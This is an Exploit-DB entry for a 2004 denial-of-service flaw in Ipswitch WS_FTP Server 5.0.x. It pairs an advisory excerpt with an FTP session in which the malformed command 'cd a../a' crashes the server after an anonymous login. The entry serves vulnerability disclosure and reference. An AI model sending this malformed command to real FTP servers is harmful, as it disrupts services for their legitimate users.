Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service Vulnerability

2004-08-30T00:00:00
ID EDB-ID:24416
Type exploitdb
Reporter lion
Modified 2004-08-30T00:00:00

Description

Ipswitch WS_FTP Server 5.0.x CD Command Malformed File Path Remote Denial of Service Vulnerability. CVE-2004-1643. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/11065/info

WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command.

WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well. 

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.